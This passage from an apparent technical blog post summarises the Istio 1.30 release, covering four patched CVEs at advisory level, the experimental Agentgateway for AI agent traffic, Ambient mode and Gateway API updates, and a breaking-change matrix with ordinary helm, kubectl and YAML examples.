&lt;td&gt;Competing eBPF runtime security options mature&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;2026.05.18&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Istio 1.30.0 + 1.29.3 + 1.28.7 released simultaneously&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;4 CVE patches + Agentgateway experimental + TrafficExtension API + Helm v4 SSA&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2026.05.18&lt;/td&gt;
&lt;td&gt;Supported Kubernetes range moves to 1.32 – 1.36&lt;/td&gt;
&lt;td&gt;Clusters on 1.31 should track 1.29 LTS&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;H2 2026 (planned)&lt;/td&gt;
&lt;td&gt;Ambient Multicluster GA + Agentgateway beta&lt;/td&gt;
&lt;td&gt;Stabilization candidate for 1.31; sidecar mode increasingly maintenance-only&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The two practical takeaways: 1.30 is a &lt;strong&gt;security major&lt;/strong&gt; rather than a routine bugfix release, and the four breaking changes in the upgrade notes touch things teams habitually leave on autopilot (debug, CNI, sidecar selection).&lt;/p&gt;

&lt;h2&gt;
  
  
  2. The four CVEs patched together — what attack surface closed
&lt;/h2&gt;

&lt;p&gt;This is the security-driven center of gravity for the release. The same four advisories also land in 1.28.7 and 1.29.3, so everyone on a supported track is in scope right now.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;CVE&lt;/th&gt;
&lt;th&gt;Severity&lt;/th&gt;
&lt;th&gt;Component&lt;/th&gt;
&lt;th&gt;One-line summary&lt;/th&gt;
&lt;th&gt;Patch behavior&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;CVE-2026-31837&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Critical&lt;/td&gt;
&lt;td&gt;istiod · RequestAuthentication&lt;/td&gt;
&lt;td&gt;JWKS fallback leaks RSA private key → attacker forges JWTs&lt;/td&gt;
&lt;td&gt;JWKS fallback strictly serializes public-key fields only&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;CVE-2026-31838&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;High&lt;/td&gt;
&lt;td&gt;istiod · port 15010 XDS&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;syncz&lt;/code&gt; / &lt;code&gt;config_dump&lt;/code&gt; reachable on plaintext XDS without auth&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;ENABLE_DEBUG_ENDPOINT_AUTH=true&lt;/code&gt; default; XDS goes through the same gate as HTTP&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;CVE-2026-39350&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Medium&lt;/td&gt;
&lt;td&gt;istiod · AuthorizationPolicy&lt;/td&gt;
&lt;td&gt;Regex metacharacters in &lt;code&gt;source.principals&lt;/code&gt; / &lt;code&gt;source.namespaces&lt;/code&gt; not escaped&lt;/td&gt;
&lt;td&gt;Auto-quote SPIFFE identifiers and namespace names before regex conversion&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;CVE-2026-41413&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Medium&lt;/td&gt;
&lt;td&gt;istiod · JWKS URI blocking&lt;/td&gt;
&lt;td&gt;CIDR block bypassed via HTTP redirects / issuer discovery&lt;/td&gt;
&lt;td&gt;Custom &lt;code&gt;DialContext.Control&lt;/code&gt; filters after DNS resolution, before dialing&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  2.1 CVE-2026-31837 — RSA private key leaks via JWKS fallback
&lt;/h3&gt;

&lt;p&gt;The worst of the four. &lt;code&gt;RequestAuthentication&lt;/code&gt; fetches JWKS from &lt;code&gt;jwksUri&lt;/code&gt;; if that fetch fails, istiod falls back to a cached key set. The fallback serializer accidentally included RSA &lt;em&gt;private&lt;/em&gt; components (&lt;code&gt;d&lt;/code&gt;, &lt;code&gt;p&lt;/code&gt;, &lt;code&gt;q&lt;/code&gt;, …) when emitting the key set into downstream Envoy JWT-filter config. Since Envoy config flows over the XDS channel, any sufficiently privileged in-mesh workload that could dump that config effectively held the JWT issuer's signing key. Outcome: &lt;strong&gt;attackers forge arbitrary claims → bypass &lt;code&gt;AuthorizationPolicy&lt;/code&gt; → reach protected workloads&lt;/strong&gt;. The 1.30 patch whitelists public-key fields only (&lt;code&gt;n&lt;/code&gt;, &lt;code&gt;e&lt;/code&gt;, &lt;code&gt;kid&lt;/code&gt;, &lt;code&gt;kty&lt;/code&gt;, &lt;code&gt;use&lt;/code&gt;). Credit to &lt;code&gt;1seal&lt;/code&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  2.2 CVE-2026-31838 — XDS debug endpoints reachable without authentication
&lt;/h3&gt;

&lt;p&gt;istiod's HTTP debug endpoints were already gated, but the &lt;strong&gt;XDS-channel debug RPCs&lt;/strong&gt; (&lt;code&gt;syncz&lt;/code&gt;, &lt;code&gt;config_dump&lt;/code&gt;) hosted on plaintext XDS port 15010 went through a different code path with no authentication. Plaintext XDS is meant for narrow node-bootstrap scenarios where mTLS isn't yet bootstrapped, but a misconfigured NetworkPolicy could expose it to neighbors. From 1.30, &lt;code&gt;ENABLE_DEBUG_ENDPOINT_AUTH=true&lt;/code&gt; is the default and applies to both HTTP and XDS debug paths. Operators that need to widen the authorized callers beyond the system namespace can list extra namespaces in &lt;code&gt;DEBUG_ENDPOINT_AUTH_ALLOWED_NAMESPACES&lt;/code&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  2.3 CVE-2026-39350 — AuthorizationPolicy regex escaping
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;AuthorizationPolicy&lt;/code&gt; translates &lt;code&gt;source.principals&lt;/code&gt; (SPIFFE suffix match) and &lt;code&gt;source.namespaces&lt;/code&gt; into Envoy regex configuration. SPIFFE identifiers contain &lt;code&gt;.&lt;/code&gt;, &lt;code&gt;-&lt;/code&gt;, and other regex-meaningful characters that were not being escaped, so a rule meant to match &lt;code&gt;cluster.local/ns/team-a/sa/api&lt;/code&gt; could also match alternates like &lt;code&gt;cluster_local/ns/team-a/sa/api&lt;/code&gt;. More dangerously, accidental wildcards could allow same-named ServiceAccounts in &lt;em&gt;other&lt;/em&gt; namespaces to satisfy the rule. 1.30 quotes identifiers automatically before regex compilation. Credit to &lt;code&gt;Alex0Young&lt;/code&gt; and &lt;code&gt;Wernerina&lt;/code&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  2.4 CVE-2026-41413 — JWKS URI CIDR blocking bypassed
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;BLOCKED_CIDRS_IN_JWKS_URIS&lt;/code&gt; was meant to prevent istiod from fetching JWKS from private IP ranges, but it didn't apply when the URI went through an HTTP redirect or when the well-known issuer discovery endpoint pointed at a JWKS URI in a private range. 1.30 introduces a custom &lt;code&gt;DialContext.Control&lt;/code&gt; that filters connections &lt;strong&gt;after DNS resolution but before dialing&lt;/strong&gt; — preserving happy eyeballs and &lt;code&gt;dialSerial&lt;/code&gt; while enforcing the block all the way through redirect chains. &lt;code&gt;istioctl analyze&lt;/code&gt; now warns (&lt;code&gt;IST0175&lt;/code&gt;) when &lt;code&gt;RequestAuthentication&lt;/code&gt; is in use but &lt;code&gt;BLOCKED_CIDRS_IN_JWKS_URIS&lt;/code&gt; is not configured. Credit to &lt;code&gt;KoreaSecurity&lt;/code&gt;, &lt;code&gt;1seal&lt;/code&gt;, and &lt;code&gt;AKiileX&lt;/code&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  3. Agentgateway — a new data plane for AI agent and MCP traffic
&lt;/h2&gt;

&lt;p&gt;The headline new feature. Agentgateway is a data-plane proxy designed for AI agent and MCP (Model Context Protocol) server traffic. When enabled, it &lt;strong&gt;replaces Envoy on the gateway pod&lt;/strong&gt;, but only as a Gateway API gateway — not as a sidecar or waypoint.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# 1) Enable feature flag on istiod&lt;/span&gt;
helm upgrade istiod istio/istiod &lt;span class="nt"&gt;-n&lt;/span&gt; istio-system &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--reuse-values&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--set&lt;/span&gt; pilot.env.PILOT_ENABLE_AGENTGATEWAY&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;true&lt;/span&gt;

&lt;span class="c"&gt;# 2) Confirm GatewayClass is registered&lt;/span&gt;
kubectl get gatewayclass istio-agentgateway &lt;span class="nt"&gt;-o&lt;/span&gt; yaml

&lt;span class="c"&gt;# 3) Use it from a Gateway resource&lt;/span&gt;
&lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt; | kubectl apply -f -
apiVersion: gateway.networking.k8s.io/v1
kind: Gateway
metadata:
  name: ai-agent-ingress
  namespace: ai-platform
spec:
  gatewayClassName: istio-agentgateway   # ← uses agentgateway instead of Envoy
  listeners:
  - name: mcp
    port: 8080
    protocol: HTTP
    allowedRoutes:
      namespaces:
        from: Same
&lt;/span&gt;&lt;span class="no"&gt;EOF
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Why not Envoy — what agentgateway is optimized for
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Axis&lt;/th&gt;
&lt;th&gt;Envoy (Istio default)&lt;/th&gt;
&lt;th&gt;Agentgateway (experimental)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Design goal&lt;/td&gt;
&lt;td&gt;General-purpose L4/L7 proxy&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Built for AI agent / MCP / LLM inference traffic&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Streaming model&lt;/td&gt;
&lt;td&gt;HTTP/2 multiplexing, gRPC streaming&lt;/td&gt;
&lt;td&gt;Long-lived SSE, MCP stdio-over-HTTP, tool-call streaming&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Token / session model&lt;/td&gt;
&lt;td&gt;JWT-based RequestAuthentication&lt;/td&gt;
&lt;td&gt;MCP session and tool-invocation context as first-class concepts&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Supported modes&lt;/td&gt;
&lt;td&gt;Sidecar / Waypoint / Gateway&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Gateway only&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Config model&lt;/td&gt;
&lt;td&gt;EnvoyFilter / TelemetryAPI / WasmPlugin&lt;/td&gt;
&lt;td&gt;Gateway API + agentgateway-specific policies&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Activation&lt;/td&gt;
&lt;td&gt;Default&lt;/td&gt;
&lt;td&gt;&lt;code&gt;PILOT_ENABLE_AGENTGATEWAY=true&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Maturity&lt;/td&gt;
&lt;td&gt;GA&lt;/td&gt;
&lt;td&gt;Experimental&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The fit at 1.30 is "isolate AI traffic onto its own gateway, leave everything else on Envoy." That's exactly the deployment shape teams running an internal RAG gateway or MCP fleet already prefer.&lt;/p&gt;

&lt;h2&gt;
  
  
  4. Ambient mode — CIDR ServiceEntry, XFCC synthesis, HBONE tuning
&lt;/h2&gt;

&lt;p&gt;For Ambient adopters, 1.30 is the biggest operability jump since the mode shipped.&lt;/p&gt;

&lt;h3&gt;
  
  
  4.1 CIDR ServiceEntry — expose IP ranges to Ambient directly
&lt;/h3&gt;

&lt;p&gt;Until now, modeling an external database or legacy VM pool with many IPs in Ambient meant enumerating every IP as an endpoint. 1.30 lets you put a CIDR directly into &lt;code&gt;ServiceEntry.endpoints[].address&lt;/code&gt;, and ztunnel does longest-prefix-match routing.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;networking.istio.io/v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ServiceEntry&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;legacy-vm-pool&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;data-platform&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;hosts&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;legacy.internal&lt;/span&gt;
  &lt;span class="na"&gt;addresses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;10.20.0.0/24&lt;/span&gt;
  &lt;span class="na"&gt;ports&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;number&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;5432&lt;/span&gt;
    &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;pg&lt;/span&gt;
    &lt;span class="na"&gt;protocol&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;TCP&lt;/span&gt;
  &lt;span class="na"&gt;resolution&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;STATIC&lt;/span&gt;
  &lt;span class="na"&gt;endpoints&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;address&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;10.20.0.0/24&lt;/span&gt;   &lt;span class="c1"&gt;# ← 1.30 accepts CIDR directly&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  4.2 Optional XFCC synthesis at waypoints
&lt;/h3&gt;

&lt;p&gt;In Ambient, ztunnel handles mTLS and HBONE; waypoints handle L7 policy. If an upstream application needs to see &lt;em&gt;who originally called&lt;/em&gt; via &lt;code&gt;x-forwarded-client-cert&lt;/code&gt;, that wasn't possible — there was no path to surface ztunnel's SPIFFE identity at the waypoint. 1.30 adds the annotation &lt;code&gt;ambient.istio.io/xfcc-include-client-identity: "true"&lt;/code&gt; on a waypoint &lt;code&gt;Gateway&lt;/code&gt; (or its &lt;code&gt;GatewayClass&lt;/code&gt;). The waypoint &lt;strong&gt;synthesizes and overwrites XFCC&lt;/strong&gt; using the ztunnel-provided source workload SPIFFE identity. Any inbound XFCC value is discarded, so a client that tried to spoof the header gets ignored.&lt;/p&gt;

&lt;h3&gt;
  
  
  4.3 HBONE window-size tuning + ztunnel Tokio metrics
&lt;/h3&gt;

&lt;p&gt;High-throughput Ambient workloads were reporting buffering / throughput loss caused by small initial HTTP/2 window sizes on HBONE CONNECT upstream clusters. Two environment variables tune this in 1.30, with two more relevant networking knobs landing in the same release.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Env var&lt;/th&gt;
&lt;th&gt;Default&lt;/th&gt;
&lt;th&gt;Role&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;PILOT_HBONE_INITIAL_STREAM_WINDOW_SIZE&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Envoy default&lt;/td&gt;
&lt;td&gt;Initial stream window for HBONE CONNECT (waypoints / E-W gateways)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;PILOT_HBONE_INITIAL_CONNECTION_WINDOW_SIZE&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Envoy default&lt;/td&gt;
&lt;td&gt;Initial connection window for HBONE CONNECT&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;DNS_FORWARD_TIMEOUT&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;5s&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Upstream DNS timeout (failover trigger)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;PILOT_GATEWAY_TRANSPORT_SOCKET_CONNECT_TIMEOUT&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;15s&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Gateway listener TLS handshake timeout; &lt;code&gt;0s&lt;/code&gt; disables&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Observability follows. ztunnel now exposes &lt;strong&gt;Tokio runtime metrics&lt;/strong&gt; (worker queue depths, blocking thread usage), and the official Grafana dashboard adds a &lt;strong&gt;ztunnel Resource Usage&lt;/strong&gt; panel that overlays active TCP connections, open file descriptors, and open sockets per instance — a one-screen view of ztunnel pressure that previously had to be inferred indirectly.&lt;/p&gt;

&lt;h2&gt;
  
  
  5. Gateway API v1.5 — TLSRoute Termination, Mixed Mode, BackendTLSPolicy v1
&lt;/h2&gt;

&lt;p&gt;Istio 1.30 catches up with Gateway API v1.5 GA.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Gateway API v1.5 capability&lt;/th&gt;
&lt;th&gt;Istio 1.30 support&lt;/th&gt;
&lt;th&gt;Operational meaning&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;TLSRoute&lt;/code&gt; termination + mixed mode&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Yes&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;A single Gateway can mix terminating and passthrough TLS listeners&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;TLS passthrough listeners on east-west gateways&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Yes&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Non-HBONE ports (e.g., K8s API server across networks) reachable via Gateway API; requires &lt;code&gt;AMBIENT_ENABLE_MULTI_NETWORK&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;protocol: TLS&lt;/code&gt; Gateway listener accepted by default&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Default on&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;No more &lt;code&gt;PILOT_ENABLE_ALPHA_GATEWAY_API=true&lt;/code&gt; to get TLS passthrough&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;AttachedListenerSets&lt;/code&gt; status&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Yes&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Gateway status reports number of attached ListenerSets, plus per-listener route counts&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;FrontendTLSValidation&lt;/code&gt; (GEP-91)&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Yes&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Enables mTLS ingress gateway configuration&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;HTTPRoute&lt;/code&gt; + &lt;code&gt;GRPCRoute&lt;/code&gt; host coexistence&lt;/td&gt;
&lt;td&gt;Fixed&lt;/td&gt;
&lt;td&gt;Same gateway hostname can host both without conflict&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Empty &lt;code&gt;backendRefs&lt;/code&gt; on &lt;code&gt;HTTPRoute&lt;/code&gt; returns 404&lt;/td&gt;
&lt;td&gt;Fixed&lt;/td&gt;
&lt;td&gt;Previously incorrectly returned 500&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  6. TrafficExtension API — the beginning of WasmPlugin's deprecation
&lt;/h2&gt;

&lt;p&gt;Proxy extension in Istio was split across &lt;code&gt;EnvoyFilter&lt;/code&gt;, &lt;code&gt;WasmPlugin&lt;/code&gt;, and &lt;code&gt;TelemetryAPI&lt;/code&gt;. 1.30 consolidates Wasm and Lua extensibility behind the new &lt;strong&gt;&lt;code&gt;TrafficExtension&lt;/code&gt;&lt;/strong&gt; API. The same resource targets sidecars, gateways, and waypoints.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;extensions.istio.io/v1alpha1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;TrafficExtension&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;rate-limit-lua&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ingress&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;selector&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;matchLabels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;istio&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ingressgateway&lt;/span&gt;
  &lt;span class="na"&gt;phase&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;AUTHN&lt;/span&gt;     &lt;span class="c1"&gt;# or AUTHZ / STATS&lt;/span&gt;
  &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;LUA&lt;/span&gt;        &lt;span class="c1"&gt;# or WASM&lt;/span&gt;
  &lt;span class="na"&gt;config&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;inlineCode&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
      &lt;span class="s"&gt;function envoy_on_request(handle)&lt;/span&gt;
        &lt;span class="s"&gt;local h = handle:headers():get("x-api-key")&lt;/span&gt;
        &lt;span class="s"&gt;if h == nil then&lt;/span&gt;
          &lt;span class="s"&gt;handle:respond({[":status"] = "401"}, "missing api key")&lt;/span&gt;
        &lt;span class="s"&gt;end&lt;/span&gt;
      &lt;span class="s"&gt;end&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;WasmPlugin&lt;/code&gt; still works, but new feature investment is moving to &lt;code&gt;TrafficExtension&lt;/code&gt;, and a deprecation timeline for &lt;code&gt;WasmPlugin&lt;/code&gt; is expected in a future release. New extensibility work starting today should start on &lt;code&gt;TrafficExtension&lt;/code&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  7. Helm v4 SSA + the breaking-change matrix
&lt;/h2&gt;

&lt;p&gt;1.30 ships first-class &lt;strong&gt;Helm v4 (Server-Side Apply)&lt;/strong&gt; support. The longstanding &lt;code&gt;ValidatingWebhookConfiguration&lt;/code&gt; &lt;code&gt;failurePolicy&lt;/code&gt; ownership conflict — which broke &lt;code&gt;helm upgrade&lt;/code&gt; under SSA — is resolved by omitting &lt;code&gt;failurePolicy&lt;/code&gt; from the webhook template on upgrade and preserving the runtime value set by the webhook controller. Tooling that respects &lt;code&gt;.Release.IsUpgrade&lt;/code&gt; (Helm 4, Flux) just works. If you use &lt;code&gt;helm template&lt;/code&gt; with SSA, set &lt;code&gt;base.validationFailurePolicy: Fail&lt;/code&gt; explicitly.&lt;/p&gt;

&lt;h3&gt;
  
  
  Istio 1.29 → 1.30 breaking-change matrix
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Area&lt;/th&gt;
&lt;th&gt;1.29 behavior&lt;/th&gt;
&lt;th&gt;1.30 behavior&lt;/th&gt;
&lt;th&gt;Revert&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;CNI config file permissions&lt;/td&gt;
&lt;td&gt;0644&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;0600 (CIS Kubernetes Benchmark v1.12)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;values.cni.env.CNI_CONF_GROUP_READ=true&lt;/code&gt; → 0640&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CNI Agent &lt;code&gt;excludeNamespaces&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Plugin only; agent ignored it&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Agent now honors it — already-enrolled pods get un-enrolled&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;—&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Sidecar hostname namespace pick (multiple namespaces)&lt;/td&gt;
&lt;td&gt;First alphabetically&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Kubernetes &lt;code&gt;Service&lt;/code&gt; preferred → oldest non-K8s service by creation time&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;PILOT_SIDECAR_PICK_BEST_SERVICE_NAMESPACE=false&lt;/code&gt; or &lt;code&gt;compatibilityVersion=1.28&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;XDS debug endpoints (15010)&lt;/td&gt;
&lt;td&gt;No auth&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;&lt;code&gt;ENABLE_DEBUG_ENDPOINT_AUTH=true&lt;/code&gt; default — auth required&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;ENABLE_DEBUG_ENDPOINT_AUTH=false&lt;/code&gt; (not recommended)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Untaint controller&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;PILOT_ENABLE_NODE_UNTAINT_CONTROLLERS&lt;/code&gt; set manually&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Auto-configured from Helm &lt;code&gt;taint.enabled&lt;/code&gt;&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;—&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Default image registry&lt;/td&gt;
&lt;td&gt;Previous registry&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;&lt;code&gt;registry.istio.io&lt;/code&gt;&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Old registry still reachable&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Supported Kubernetes&lt;/td&gt;
&lt;td&gt;1.31 – 1.35&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;1.32 – 1.36&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Stay on 1.29 LTS for K8s 1.31&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
